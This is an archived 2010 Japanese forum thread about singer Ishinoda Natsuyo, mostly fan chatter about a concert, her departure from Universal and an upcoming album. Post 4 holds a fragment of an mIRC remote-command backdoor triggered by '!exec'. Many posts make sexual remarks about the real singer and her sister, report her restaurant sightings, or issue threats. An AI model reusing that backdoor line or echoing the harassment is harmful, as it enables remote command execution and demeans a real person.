5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

石野田奈津代(いしのだなつよ)vo.11

1 :名無しの歌姫:2010/03/14(日) 05:05:46 ID:IHhOFVE+0
新スレッド立てました(^-^)
あまりにも過激な下ネタは控えるようにw

前スレ
http://anchorage.2ch.net/test/read.cgi/musicjf/1243773098/l50

・石野田奈津代(いしのだなつよ)official web site☆
 http://www.ishinoda.com/
・石野田奈津代blog「724world☆」(旧ブログ)
 http://724world.jugem.cc/
・神津島フリーライブイベント「ミュージックダイブ」
 http://www.musicdive.jp/



2 :名無しの歌姫:2010/03/14(日) 13:25:19 ID:6H7noIHe0
    ∧_∧∩
    ( ・ω・)彡 なぁーなぁーなぁーなったあああああん!
   ⊂ ⊂彡
    (つ ノ
     (ノ


3 :名無しの歌姫:2010/03/14(日) 13:41:23 ID:xMMNgWJgP
俺の奈津代に代わって、俺様が直々に>>1をホメてやろう!!
感謝しろよな!!!

4 :名無しの歌姫:2010/03/14(日) 14:17:48 ID:sX9XRGDRQ
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

5 :名無しの歌姫:2010/03/16(火) 19:53:13 ID:41beYbcJ0
>>4
?


6 :名無しの歌姫:2010/03/18(木) 20:09:33 ID:oYqnzv5l0
何だよこの過疎っぷりは?
久しぶりにageてみる。

7 : [―{}@{}@{}-] 名無しの歌姫:2010/03/18(木) 20:13:53 ID:zkeJ1WMOP
てめぇら!!!俺の奈津代のスレを過疎らせるとか、ナメとんのか!!!


8 :名無しの歌姫:2010/03/19(金) 10:49:43 ID:7t5EnS3eP
気持ち悪いレスで埋まるなら過疎ってる方がマシだなw

9 : ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄:2010/03/20(土) 08:34:14 ID:rIVoFDe00
 ソVvミヘ/Wv彡vV/ ミ∠ミ::
  ミミ         _   ミ:::
  ミ    二__, --、r'"___、 ヾ ト、::ヽ
  ミレ'"~,-,、 !  ! ' '" ̄ .ノ \ヾ:、
  K/ー'~^~_/  ヽミ:ー‐‐'"   ヽ i.
 !〉 ー―'"( o ⊂! ' ヽ   ∪   Y_ 
 i  ∪  ,.:::二Uニ:::.、.       l i  
 .!     :r'エ┴┴'ーダ ∪    !Kl     
 .i、  .   ヾ=、__./        ト=  
  ヽ. :、∪ ゙ -―-    ,; ∪ ,!


10 :名無しの歌姫:2010/03/21(日) 14:09:20 ID:fAmnugjMQ
なつなつとセックスしたいよ〜!

11 :名無しの歌姫:2010/03/22(月) 07:57:05 ID:s7Q63WSS0
「泣ける唄」路線…。そもそもこんな売りだし方嫌いだったが…




「トイレの神様」に完全に負けてるよ。

12 :名無しの歌姫:2010/03/22(月) 10:20:58 ID:sJpN10P6O
おまいら、今日よろしくな。

13 :12:2010/03/22(月) 21:49:21 ID:sJpN10P6O
感動した!




14 :名無しの歌姫:2010/03/22(月) 21:53:11 ID:R4l3Mzv6P
俺の奈津代に感動したか!そうかそうか!!
さすがは俺の奈津代!!!

15 :名無しの歌姫:2010/03/22(月) 21:55:35 ID:DuEBy6Lu0
コンサートタイトルは「サクラ」

サクラ前線
クローバー
ループ
バラ色
シロップ
流星シャワー
永遠
60奥分の1
1等星
オリオン
深海
月夜にオリオン(なっちゃんは「ノドのお色直し」のためソラさんと雨宮さんのみ)
one.
春空
まっすぐに(昔のと歌詞が違う)

〜アンコール〜
君のうた
いっしょにかえろう

抜けや間違いがあったら訂正よろ。
10年後も変わらずに歌っていける特に大事にしている曲を選んだとのことです。
普段聞けない好きな曲がたくさんあってマジよかった。
もう感動しっぱなし。
なっちゃんはノドが本調子じゃなくてまだ辛そうだった。

そして重大発表が。
まず、過去に出した曲のセルフカバーアルバム&ニューシングルを夏に発売。

そして…







ユニバーサルミュージックを辞めるって!!

やっぱ泣き歌路線は本人も合わなかったのかな。
個人的にはこれでよかったと思う。

16 :名無しの歌姫:2010/03/22(月) 22:04:35 ID:R4l3Mzv6P
俺の奈津代め!!俺に相談なく、辞めるだと!!!???
辞めるというかクビか!!???

というかお前www
よく曲の順番とか覚えてられるよなwww
ライブ中にメモってるのか?www
たまにそういうヤツ居るなwww

17 :名無しの歌姫:2010/03/22(月) 22:19:39 ID:l+na47S9P
どう考えてもユニバーサルが合ってるようには見えなかったからな

18 :15:2010/03/22(月) 22:20:54 ID:DuEBy6Lu0
ライブ中にメモるのは恥ずかしいからしないw
てかメモってたら間違いあったら訂正よろしくとは頼まないだろ。

クビかどうかは自分で言うわけないからホントはどうなのかわかんないな。
レコード会社と自分のやりたいことのすれ違いがあるようなカンジで言ってたけど。

ちなみに移籍先探すかインディーズでやるかは未定だって。

19 :名無しの歌姫:2010/03/22(月) 22:21:04 ID:l+na47S9P
>>16
覚えられる奴もいるしメモしてる奴もいるよな
前にライト付けてメモしてるDQNがいて睨んだことある

20 :名無しの歌姫:2010/03/22(月) 23:39:26 ID:VGjS4KZI0
いいライブだったな。
作り物の泣かせ歌じゃ決して出ない涙が出たよ。
喉の調子が悪いのが痛々しかったけど、今日のコンサートは素晴しい名ライブだったと思う。
あの言い方だとユニバーサル止めるのは本人の意思だな。
インディーズでもいいから自由にやって欲しい。

21 :名無しの歌姫:2010/03/23(火) 01:13:06 ID:2Nkuy1YP0
この1年間の酷使は異常だったしな

22 :名無しの歌姫:2010/03/23(火) 10:00:24 ID:1LXHllh1P
実際は契約更新の交渉をしないって感じだろうけどね

23 :名無しの歌姫:2010/03/23(火) 17:52:10 ID:0klXrShyQ
またリストラか。なつなつはトコトン不運だね。

24 :名無しの歌姫:2010/03/23(火) 20:40:54 ID:2Nkuy1YP0
結果が全ての業界だから普通なのでは

25 :名無しの歌姫:2010/03/23(火) 21:35:42 ID:D7nCyF2S0
なつはただ売れればいいだけの音楽産業には向いてないよ。
メジャーを離れるのは正解じゃねぇか?
地味でもインデーズで自由にやって支持されてるアーティストなんてたくさんいるよ。
ある意味それが本当の音楽ってやつなんだがな。
今後に期待。

26 :名無しの歌姫:2010/03/24(水) 00:36:09 ID:IwB0Fpk60
拝郷メイコみたいに、自前のレーベルで自由にやってほしいな

27 :名無しの歌姫:2010/03/24(水) 00:44:23 ID:Lf6abtv20
お店にCDが置いてない状態になるのは微妙だけど、
有線とかでばんばん曲がかかれば歌はいいんだから
ファンも増えるだろうね。

ま、とにかくCDたくさん出してほしいな。

28 :名無しの歌姫:2010/03/24(水) 17:33:00 ID:cuRTNb3rQ
なつなつが原点に戻って下北沢の駅前で制服【女子高生コスプレ】で路上弾き語りすれば目覚ましテレビに取り上げられ再び注目されるに5000ルビー

29 :名無しの歌姫:2010/03/25(木) 05:07:28 ID:+XL2EksH0
みんなでなっちゃんを励まそうぜ
ハアハアしてる変態コテもこんなときこそ役に立つべきだ
そう思わないか?

30 :名無しの歌姫:2010/03/26(金) 09:44:27 ID:KvqSe3/a0
具体的には?

31 :名無しの歌姫:2010/03/29(月) 11:43:38 ID:drB4+k9v0
糸目のなっちゃんかわゆす

32 :名無しの歌姫:2010/03/31(水) 15:34:30 ID:PGZ/uBpD0
この童貞のばかどもお
お前らなっちゃんを見捨てたのかあああ
ひとでなしめ


33 :名無しの歌姫:2010/04/01(木) 07:59:17 ID:ZT0lyrZmQ
なっちゃんよりもアベマのほうがいい。

34 :名無しの歌姫:2010/04/02(金) 20:04:48 ID:7WbvfXNFQ
なつなつまたバイト生活に戻るの?


35 :名無しの歌姫:2010/04/02(金) 20:45:03 ID:9KEtfMAP0
月2ぐらいで小さなライブハウスでやって欲しい

36 :名無しの歌姫:2010/04/03(土) 09:00:16 ID:oM3Rg1ZK0
石野なのか野田なのかはっきりしろ

37 :名無しの歌姫:2010/04/04(日) 10:15:07 ID:z/avsmSU0
石野田です

38 :名無しの歌姫:2010/04/05(月) 18:23:07 ID:Mbp3tM4HP
俺の奈津代ーー!!!

39 :名無しの歌姫:2010/04/08(木) 23:20:51 ID:gTrBnubXO
最近人気ないのかな…

40 :名無しの歌姫:2010/04/09(金) 01:03:13 ID:4vMmZadoO
なっちゃんのセルフカバーアルバムの曲予想しようぜ!

さくらコンサートで歌詞変えた1等星、まっすぐに、は固いかな。
同じく歌ったループ、one、いっしょにかえろう、シロップ、流星シャワーあたりも可能性高い。
あとは個人的な好みで温度、ぬくもり、夢の話、約束、質問、LOVE+LIFEがあるといいな。

ただ「あのとき収録した歌が一番だと思った曲」が何のか気になるな。
当時の恋愛の気持ちを歌った曲なのかな。


41 :名無しの歌姫:2010/04/09(金) 09:34:48 ID:bImIGQlm0
>>40
ハローとかローリンとかyes!とかじゃね?
kiccaのバンドテイストが強いヤツは入らないとみた

夢の話はちゃんと-キミノユメ-とくっつけたバージョンに戻してくれ

42 :名無しの歌姫:2010/04/09(金) 12:17:12 ID:Sil8xAd5O
60億分の1 は流石にもう入らなそう。
わたしのうたバージョンでアレンジも完璧だったし。
ループいいな。
申し訳ないがまっちいのバンドアレンジは安っぽくて好きになれないから、バラ色とサクラ前線をアレンジ変えて入れてほしい。

43 :名無しの歌姫:2010/04/09(金) 13:07:07 ID:CLPa+V8IO
100sってプロ集団っぽい触れ込みだけど、まともに結果出したのひとりも居ないよね
基本的に目の覚めるような才能は感じられない
L←→Rよりかはマシだと思うけれども

44 :名無しの歌姫:2010/04/09(金) 15:55:11 ID:2Z6IWkrXO
なっちゃんってファンクラブないの?
あれば毎月なんぼか支援してあげたい


ニートだけど\(^O^)/

45 :名無しの歌姫:2010/04/09(金) 17:25:28 ID:bImIGQlm0
ソラさんと一緒だし「月夜にオリオン」入れてくれると嬉しい

46 :名無しの歌姫:2010/04/09(金) 17:49:07 ID:CLPa+V8IO
イズミカワソラっていったら、國府田と組んでたイメージが強いわ
ずいぶん昔だなぁ

47 :名無しの歌姫:2010/04/09(金) 18:25:23 ID:VVCpBOnzQ
奈津代さん叙々苑で見た。

48 :名無しの歌姫:2010/04/09(金) 20:45:11 ID:jen/Hs3X0
>>47
どこどkどこ???
俺なら超高い遊玄亭連れてったげるのに

ニートだけど\(^O^)/


49 :名無しの歌姫:2010/04/11(日) 11:20:44 ID:8YughGK+O
西麻布だよ。けんこかね御用達

50 :名無しの歌姫:2010/04/11(日) 12:31:24 ID:eGnqxCvv0
>>49
マジ!?
そこは正に俺の行きつけの游玄亭のほうの叙々苑じゃんw
なっちゃんはテレビデオ派なのに、良いもの食べてるな


51 :名無しの歌姫:2010/04/12(月) 17:50:03 ID:NnPnr75AO
あぁ金子兼ちゃん御用達かね。ミューズで卓球したいね久々に。

52 :名無しの歌姫:2010/04/14(水) 17:14:11 ID:4T2mr6PGO
なつなつとよー

53 :名無しの歌姫:2010/04/14(水) 18:22:11 ID:F8vE/EKhP
俺の奈津代ーー!!!!

54 :名無しの歌姫:2010/04/15(木) 19:56:55 ID:0Nj12h0wO
ナチュラル

55 :名無しの歌姫:2010/04/16(金) 20:09:14 ID:mbXUVeBkQ
なつなつとエッチしたいね

56 :名無しの歌姫:2010/04/16(金) 20:10:17 ID:mbXUVeBkO
なつなつと羽目まくりたい

57 :名無しの歌姫:2010/04/17(土) 17:06:55 ID:DTxyKISLQ
なつなつとハメハメハメハメしたいんだ!!

58 :名無しの歌姫:2010/04/17(土) 20:23:24 ID:DTxyKISLO
ハメハメ

59 :名無しの歌姫:2010/04/17(土) 20:26:59 ID:T2xVzUX5P
俺の奈津代のスレを汚すな!!殺すぞ!!

60 :名無しの歌姫:2010/04/17(土) 20:35:12 ID:cYOHteKLO
>>59
通報しました

61 :名無しの歌姫:2010/04/18(日) 01:03:24 ID:699zp8vyO
>>59
普通に通報もんだろ…

62 :名無しの歌姫:2010/04/18(日) 02:04:37 ID:HFK6NLsSP
俺の奈津代を汚したキサマらこそ通報もんだろ!!

63 :名無しの歌姫:2010/04/18(日) 02:35:52 ID:l3dafTqX0
ユニバーサルを離れて、ここの住人の質もまた元通り良くなったらいいのになぁ。

64 :名無しの歌姫:2010/04/18(日) 08:05:08 ID:699zp8vyQ
なつなつ…貧乳揉みたい

65 :名無しの歌姫:2010/04/18(日) 23:19:29 ID:BLh99mAR0
なつなつとハグしたい。抱きたい…というより抱かれたい。

66 :名無しの歌姫:2010/04/20(火) 21:20:59 ID:r3nn/DUr0
セルフカバーには、制約はないのかな?
ソニー時代の曲はダメとか・・ユニバーサル時代の曲はダメとか・・
iTunes Store配信限定の「いしのだなつよ-EP」は、諸事情で
CDにすることが出来なかったんでしょ??

そういう話になると、Kiccaの曲とインディーズ時代の曲しか望みがなくなっちゃうんだけどね〜

67 :名無しの歌姫:2010/04/21(水) 15:38:38 ID:RZZgYpg50
>>66
http://www2.jasrac.or.jp/eJwid/

ここで「いしのだなつよ」で検索して奈津以外の人も
権利者になってるヤツがダメなのではないでしょうか
まあ使用許諾を得れば出来るけど金がかかるとかさ

68 :名無しの歌姫:2010/04/22(木) 07:32:11 ID:FCuqLg0gQ
なつなつとベロチューしたいなぁ…

69 :名無しの歌姫:2010/04/22(木) 10:28:59 ID:OV7tU2L0P
>>66
ソニーの権利の有効期限が切れていればおkじゃない?

70 :名無しの歌姫:2010/04/22(木) 15:10:58 ID:i7DjEDms0
なつなつまじでめんこいなあ
あの顔だけでオナ○ーできるw

71 :名無しの歌姫:2010/04/24(土) 10:35:00 ID:/gX8yFeEO
アマゾンにアルバムとシングルの情報が載ってたぞ!
アルバムはタイトル「さくら」、シングルはまだタイトル未定。
どっちも7/21発売予定。

今から待ち遠しいな。

72 :名無しの歌姫:2010/04/24(土) 16:12:19 ID:nbvKUJjg0
7月に「さくら」ってw

73 :名無しの歌姫:2010/04/24(土) 21:11:50 ID:DSw+CUXMO
ニコ動に誰かがあげてくれた動画、異常にブサイクだなw

74 :名無しの歌姫:2010/04/24(土) 23:40:55 ID:hAWcq7Si0
あれがいいんだよ
まったく分かってねぇ奴だな

75 :名無しの歌姫:2010/04/25(日) 12:41:51 ID:5+Brudnj0
あれリストラ後のライブハウスの動画かな?
動画の所持者なんて間違いなくばれてんじゃね?

76 :名無しの歌姫:2010/04/26(月) 11:08:58 ID:RyNo4faKP
0721の日に出すのか

77 :名無しの歌姫:2010/04/26(月) 13:02:45 ID:Rd/xD/8a0
724の日にすれば・・・と思ったけど土曜日だから難しいのか

78 :名無しの歌姫:2010/04/26(月) 14:23:38 ID:BXuWbbGKP
岡山の会場でフライング販売あるかも。

79 :名無しの歌姫:2010/04/26(月) 20:39:40 ID:UbEJa00n0
「さくら」は、右から読むと、「らくさ」。
「(泣ける歌に縛られなくなって)らくさ」
というのを伝えたいのかも。

80 :名無しの歌姫:2010/04/27(火) 00:40:29 ID:e5g/qHU20
違います。

81 :名無しの歌姫:2010/04/27(火) 00:49:19 ID:gduQVEbJ0
二十代最後の日か

82 :名無しの歌姫:2010/04/27(火) 01:05:54 ID:gXW3qkHm0
入籍報告も兼ねてだな

83 :名無しの歌姫:2010/04/27(火) 19:43:45 ID:oGtMXV8E0
>>82
なに入籍報告って!?
誰と?
なんでそんなこと知ってるの?
みんな知ってるのか?
れいの付き人さんのことか?


84 :名無しの歌姫:2010/04/27(火) 22:13:42 ID:8hnOByXXQ
奈津代さんおめでとう!幸せになってね!

85 :名無しの歌姫:2010/04/27(火) 22:33:39 ID:oGtMXV8E0
>>84
教えろよ!!
誰なんだいったい?


86 :名無しの歌姫:2010/04/27(火) 22:44:58 ID:4A/z9IADP
お前らバカか???
俺の奈津代だぞ?????

相手は俺に決まってんじゃねーかよ!wwwwww

87 :名無しの歌姫:2010/04/27(火) 23:53:04 ID:oGtMXV8E0
>>86
目を覚ませ!!
お前の奈津代はもう既に他の男のチ○ポをくわえてハメラレテ中出しされまくってんだぞ!!

88 :名無しの歌姫:2010/04/28(水) 20:55:26 ID:O8Hq4lLfQ
なつなつは処女と信じたい…

































俺は童貞

89 :名無しの歌姫:2010/04/29(木) 00:09:07 ID:u6vKiGnZP
誕生日なのに1レスだけかよw

90 :名無しの歌姫:2010/04/29(木) 05:39:59 ID:Rq6R3KYmQ
www

91 :名無しの歌姫:2010/04/29(木) 08:27:37 ID:cNn7C/5j0
なつなつ誕生日おめでとおおおおおおおお
ブログの写真は超かわいいおおおおおおお

92 :名無しの歌姫:2010/04/29(木) 08:36:07 ID:cNn7C/5j0
>>91
同意せざるを得ませんね

93 :名無しの歌姫:2010/04/29(木) 09:17:51 ID:XbCl9mlB0
一人遊び乙

94 :名無しの歌姫:2010/04/29(木) 09:22:15 ID:cNn7C/5j0
>>93
ちがうお
今朝だけでここまで5人もなつなつの誕生日祝ってるおorz

95 :名無しの歌姫:2010/04/29(木) 09:23:04 ID:cNn7C/5j0
あああああああああああああああああああああああ

96 :名無しの歌姫:2010/04/29(木) 10:07:56 ID:Ku1t6k0q0
あら、お誕生日か。おめでとう。
ライブ1回だけ見たなぁ。
その後、機会がなかったけど、また聞いてみたいな。

97 :名無しの歌姫:2010/04/29(木) 10:30:58 ID:WW4fEVbTP
なにぃぃーー!!???
俺の奈津代の誕生日だとぉーー!!!???

そりゃめでたいな!
みんなで俺の奈津代を祝えよ!!!
誕生日プレゼントは俺の許可を得てから渡せよ!!

98 :名無しの歌姫:2010/04/29(木) 11:23:27 ID:cNn7C/5j0
>>97
お前のなつなつ運気が落ちてるぞ
この口だけ役たたずめ
なつが好きならなんとかしろ

99 :名無しの歌姫:2010/04/29(木) 18:15:53 ID:Rq6R3KYmQ
なつなつ最近勢いないけど何かあったのかな?鶴瓶効果も全然ないっすねぇ。

100 :名無しの歌姫:2010/04/29(木) 19:59:35 ID:cNn7C/5j0
100歩譲って売れ線書かないのはいいけど、スマッシュヒットの1曲もなければ悲しいけど当然退場に向かうでしょ


101 :名無しの歌姫:2010/04/29(木) 20:31:18 ID:Xc5oEP5g0
世の中の大半のミュージシャン(とその卵たち)は
ヒットもしないまま人生を終える方が多いのだから
これだけチャンスが回ってくるだけでも恵まれてると思うわ

102 :名無しの歌姫:2010/04/29(木) 20:35:50 ID:cNn7C/5j0
そう 今回の最大の鶴瓶チャンスを活かせなかった
悲しすぎるよorz

103 :名無しの歌姫:2010/04/29(木) 20:38:43 ID:cNn7C/5j0
もうTKでも、つんくでも、秋元康でも、なつなつwith Spontaniaでもなんでもいいいいいいいいいいいい

104 :名無しの歌姫:2010/04/30(金) 00:09:34 ID:pRdrBV6w0
あのまま泣き歌路線にしがみつかなかったのはよかったと思うよ。
確かに売れなかったのは残念だけど、自分の意志でメジャーから退く決断を出来た時点で逆に安心して応援出来る。

105 :名無しの歌姫:2010/04/30(金) 00:19:45 ID:mcy740bfP
俺の奈津代は、世の数居るアーティストの中では売れてる方だろ!!!
底辺で、もがいてるアーティストは山ほど居るんだぞ!!
オリコンチャートでTOP10に入るようなアーティストばっかりと比べんなよ!!


106 :名無しの歌姫:2010/04/30(金) 01:27:50 ID:q95FH+RC0
>>105
お前の奈津代ならお前がなんとかしてやれよ


107 :名無しの歌姫:2010/04/30(金) 10:40:52 ID:O8L+KilH0
みんな勘違いしてる。
もはや売れることが目的じゃないでしょ。

108 :名無しの歌姫:2010/04/30(金) 11:16:51 ID:q95FH+RC0
>>107
お前が勘違いだ
この状況はなつ本人からしてもやむなしだ
なつの気持ちが全然分かってない勝手なファン
本人がインディーズでもなんでも自分さえ曲を聴ければいいなんてガキの発想だろ

109 :名無しの歌姫:2010/04/30(金) 19:41:55 ID:mcy740bfP
俺の奈津代でケンカするのは、もうやめてあげて!!><


110 :名無しの歌姫:2010/04/30(金) 21:09:35 ID:eQLxyKjz0
どうでもいい話で盛り上がってきたなぁ

111 :名無しの歌姫:2010/05/01(土) 00:04:44 ID:2bd81Dt0Q
再リストラwww

112 :名無しの歌姫:2010/05/01(土) 00:47:10 ID:7988E4Ia0
オレは今のなっちゃんの歌が大好きだ。
このまま10年後も歌を作っててもらいたいし、その歌を聴いていたいと思えるアーティストであって欲しい。

メジャーだとかインディーズだとかなんてどうでもいい。
極論言えば、自分が歌を聴き続けられるなら何でもいい。
そのためにCD買ったりライブ行ったり、自分で出来る限りの応援をしてる。
そして応援する人がいる限り、きっと歌を作ってくれて聴き続けられる。

それだけで十分だと思ってる。

113 :名無しの歌姫:2010/05/01(土) 01:15:44 ID:YJzEXqn/0
まあどんな形でもいいけど、今後彼女が音楽を続けるのには金銭的な問題が大きいんだよ
インディーズなら余計に厳しくないかい!?
自分は自分達ファンが音楽を聴き続けられればいいというより、当事者のなつ自身が満足に音楽活動を続けられればいい
それをただ聴くだけだ

114 :名無しの歌姫:2010/05/01(土) 05:33:12 ID:2bd81Dt0Q
再リストラ歌手で悲劇のヒロインキャラで売り出せばいい。

115 :名無しの歌姫:2010/05/01(土) 14:24:26 ID:JzhgWD+G0
再リストラで、また泣ける歌か?
もういいわ・・・

116 :名無しの歌姫:2010/05/01(土) 14:56:43 ID:8VsDgvUA0
このご時世にリストラネタで売れるわけねえw
好きに歌を歌いながら生きていけてるだけ恵まれてる
景気回復ネタでも歌ったほうがいいんじゃねーの

117 :名無しの歌姫:2010/05/01(土) 22:47:55 ID:5DiLRXkX0
それでも俺は、なつなつに付いていく!

118 :名無しの歌姫:2010/05/02(日) 12:57:21 ID:GWJYX58A0
なっちゃんGW予定あるのかな?
もれとデートしてください!!
大好きだああああああああああああああああああああああああああ

119 :名無しの歌姫:2010/05/03(月) 10:34:02 ID:VotftnID0
みんなはメジャーのなつなつが好みなのか!?
メジャーでもインディーズでもプロのミュージシャンであるのには変わらないはず。
俺はどこまでも付いていくよ!

120 :名無しの歌姫:2010/05/03(月) 19:01:48 ID:dL4ehu6Y0
なっちゃんはもれに就職が決まったお(;^ω^)
もまえら安心しろ
奈津子はもれが幸せにすっからお

121 :名無しの歌姫:2010/05/03(月) 19:15:58 ID:mksoLnbiP
>>120
おめ!!誰か知らないが奈津子ってヤツを幸せにしてやってくれ!!
俺は俺の奈津代を幸せにしてやるぞ!!

122 :名無しの歌姫:2010/05/03(月) 21:27:39 ID:dL4ehu6Y0
>>121
マジレスされたwww
曽根奈津子なのだあああ

つまんねな

123 :名無しの歌姫:2010/05/04(火) 00:16:32 ID:0qgJLcOU0
【音楽】壮絶体験を歌う13歳の天才シンガー、中川あゆみが「泣ける」と話題

こんなのが2chじゃフルボッコに笑われてるし
奈津もこんな系にならなくて良かったと思いたい

124 :名無しの歌姫:2010/05/04(火) 01:35:41 ID:cQpc3Vbd0
>>123
おいおいw
なちゅなちゅはもう三十路だぞ
10代の子と比較すんなや
しかも犯罪集団のエイベッ糞じゃんw


125 :名無しの歌姫:2010/05/04(火) 06:39:04 ID:dl6WQVrRQ
おいおい…赤坂の叙○苑で昨日見たぞ…この人焼肉好きなんだねぇ(笑)

126 :名無しの歌姫:2010/05/04(火) 10:58:19 ID:cQpc3Vbd0
>>125
なんだと!?
男と二人でか!?

127 :名無しの歌姫:2010/05/04(火) 11:22:09 ID:x8kSnlyMP
>>125
おまえもなw

128 :名無しの歌姫:2010/05/04(火) 15:14:40 ID:S6s+JKAR0
二重にしたら人気爆発したりしてw

129 :名無しの歌姫:2010/05/05(水) 08:37:53 ID:zJ5HMlY9Q
二重にしたら優香と見分けつかねぇだろうが!!

130 :名無しの歌姫:2010/05/05(水) 18:35:35 ID:LIFMZDRs0
やっぱ優香似てるよね!?
昔俺が似てるって言ったらブーイングがあったが、やっぱ優香だ優香だあ
なちゅなちゅの顔みるだけでオ○ニーしたくなるのは俺だけだ!!

131 :名無しの歌姫:2010/05/05(水) 19:25:04 ID:zJ5HMlY9Q
二重にしたらマジで優香になるから…間違いない! 生でなつなつ見た時に優香にクリソツだったもん目意外。

132 :名無しの歌姫:2010/05/05(水) 19:32:43 ID:LIFMZDRs0
>>131
同士よ!!
なちゅなちゅはやっぱかーいーよね!!
写真集だして欲しいよね!?
水着でね!

133 :名無しの歌姫:2010/05/05(水) 19:55:09 ID:NTS4SUtk0
優香に似てるワケねーだろ。

もしかして、乳が結構あるって意味じゃないよな?

あれば、即ライブ行くw

134 :名無しの歌姫:2010/05/05(水) 20:00:24 ID:LIFMZDRs0
>>133
似てるお!!節穴メ!!お前みたいのはファンじゃねーお!!
俺は毎回ライブで握手してもらってるけど1回胸ちらサービスしてもらったお
貧乳かどうかは別としてそれ以来惚れた

135 :名無しの歌姫:2010/05/05(水) 23:06:44 ID:9bXQ+6Kc0
優香にあやまれ

136 :名無しの歌姫:2010/05/05(水) 23:09:32 ID:LIFMZDRs0
>>135
なつを侮辱するお前みたいな奴はもれが許さねお
お前こそなつに謝れおおお

137 :名無しの歌姫:2010/05/06(木) 18:02:04 ID:Wgy4t5VGQ
マジで生なつなつ見たら優香に似てる〜って思うから。遊玄亭によく来るらしいから皆一回焼肉食べに行けば?

138 :名無しの歌姫:2010/05/06(木) 20:27:13 ID:+kB9aWjE0
>>137
なっちゃん囲んでファンのみんなで食べようぜ!!
おごってくれるかな(^^;)

139 :名無しの歌姫:2010/05/06(木) 20:29:50 ID:+kB9aWjE0
てゆーか、なっちゃんは男と2人で来てるのか!?
それが問題だ 誰か教えて!!

140 :名無しの歌姫:2010/05/06(木) 22:15:11 ID:iw84mfhqP
>>138
じゃあお前のおごりでなwwww

141 :名無しの歌姫:2010/05/06(木) 22:40:02 ID:+kB9aWjE0
>>140
お前以外の来た奴みんなおごるぜ!!
俺の席はなつの膝の上な

142 :名無しの歌姫:2010/05/07(金) 18:07:40 ID:MXvLQIcMQ
なつなつと雅敘園で結婚式あげたいなぁ(はぁと

143 :名無しの歌姫:2010/05/08(土) 20:52:11 ID:G3kib5eeQ
なつなつ二重にしねーかな?マヂ可愛くなっからよ!

144 :名無しの歌姫:2010/05/08(土) 21:17:00 ID:9duszpI20
いまのままのなつなつかわいいお
お顔ぺろぺろしたいお
二重なんて必要ねー

145 :名無しの歌姫:2010/05/09(日) 12:32:44 ID:V/eHGZwlQ
優香になったナツナツ

146 :名無しの歌姫:2010/05/09(日) 20:52:08 ID:UE+iAfxa0
>7月21日発売週の週末、関西&関東でインストアライブしますっ!

これは!!!俺の奈津代が俺のホームグラウンドである西宮ガーデンズに来るという予告か!!??
7月の24か25、てめぇら!!西宮ガーデンズに集合だぞ!!分かったな!!??
来てCDを買わなかったらぶっ殺すからな!!
ネラーの顔なんか人生の敗北者オーラで分かんだよ!www

147 :名無しの歌姫:2010/05/09(日) 23:37:05 ID:V/eHGZwlQ
え?三番街に来るらしいで。

148 :名無しの歌姫:2010/05/10(月) 00:36:09 ID:VxDq6l9n0
ちゃんなつ・・・
おれと結婚して欲しい

149 :名無しの歌姫:2010/05/10(月) 17:58:20 ID:HBj0BfDtQ
三番街から茶屋町!!なつなつと天六でデートしたいぃいいぃい!!

150 :名無しの歌姫:2010/05/11(火) 07:54:22 ID:dTVh2NxSQ
なつなつと、もしもしピエロ桜ノ宮店でハメハメしたいぃいいいい!!

151 :名無しの歌姫:2010/05/11(火) 09:24:44 ID:dTVh2NxSQ
なつなつとカンテGでチャイチャイしたいぃいいい!!

152 :名無しの歌姫:2010/05/11(火) 10:04:48 ID:IfqQ7cDI0
これだから関西人は・・・

153 :名無しの歌姫:2010/05/12(水) 17:55:18 ID:8lyMUYHmQ
なつなつと新今宮のユニクロでショッピングデートしたいぃいいい!!その後フェスティバルゲートでマル秘混浴したいぃいいい!!

154 :名無しの歌姫:2010/05/13(木) 13:55:10 ID:+x9rvRMWQ
なつなつとベロチューしたい…

155 :名無しの歌姫:2010/05/13(木) 22:45:18 ID:CV5R2bezP
新今宮はやめろよw

156 :名無しの歌姫:2010/05/15(土) 20:58:02 ID:Y/MNej2iQ
じゃあ、大国町のスーパー玉出でショッピングデートや!


157 :名無しの歌姫:2010/05/15(土) 21:12:42 ID:Y/MNej2iQ
がっぴょ〜ん

158 :名無しの歌姫:2010/05/16(日) 18:13:11 ID:9PZzfOV3Q
なつなつが優香になる日は近いか?

はやく二重にしないかな…

159 :名無しの歌姫:2010/05/17(月) 00:27:04 ID:WtpjVG+U0
俺の嫁に失礼!

160 :名無しの歌姫:2010/05/17(月) 17:49:48 ID:1kI+3WzVQ
はやく二重にしないかな…

161 :名無しの歌姫:2010/05/17(月) 18:24:28 ID:1kI+3WzVQ
なつなつ…好きだ

162 :名無しの歌姫:2010/05/17(月) 21:26:44 ID:WtpjVG+U0
なつは妹さんと同居してるんだね
彼氏と住んでんだと思ってたw
てことは男性経験もないのかなあ

163 :名無しの歌姫:2010/05/18(火) 02:40:29 ID:Y+WejggJ0
妹さんが来る前は一人暮らしだった

164 :名無しの歌姫:2010/05/18(火) 03:04:01 ID:EXkzpB4W0
俺の奈津代と妹で3Pか!!いいねぇーー!!!wwww

165 :名無しの歌姫:2010/05/18(火) 16:58:11 ID:PQf+8fFm0
一般人は巻き込むなよ

166 :名無しの歌姫:2010/05/18(火) 21:08:17 ID:jOW7GGmV0
>>163
妹さん来たのっていつ?
いつからいつまで一人暮らしだったの?(=何年間、男とのヤリ部屋にしてたの?)

167 :名無しの歌姫:2010/05/18(火) 21:41:35 ID:fnKf6WmU0
眼力なさすぎ、売れたけりゃ二重にするだろ、普通w

168 :名無しの歌姫:2010/05/20(木) 15:06:45 ID:6N9tgIDs0
212 :名無しのエリー:04/03/09 20:41 ID:03sD510n
↑路上ライブのときから、キモい目つきでしっかり見てますYO!妄想では何度もエッチしてるYO!なつよのためなら死ねるYO!

kiccaのスレからずーっといるんだなwww
http://mimizun.com/log/2ch/musicj/1068119869/

169 :名無しの歌姫:2010/05/20(木) 18:38:36 ID:nZWUYON3Q
なつなつ…好きだ! セックスしたい!!

170 :名無しの歌姫:2010/05/22(土) 20:52:28 ID:9yFQmua+Q
ナツナツ

171 :名無しの歌姫:2010/05/23(日) 10:05:59 ID:XtriL4750
6月20日のチケットを買ってきた。
今から楽しみ。

